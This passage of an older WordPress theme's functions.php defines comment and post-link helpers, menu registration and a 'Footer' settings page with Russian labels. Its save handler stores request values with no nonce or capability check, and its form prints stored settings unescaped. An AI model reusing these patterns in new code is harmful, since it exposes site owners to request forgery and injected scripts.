	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
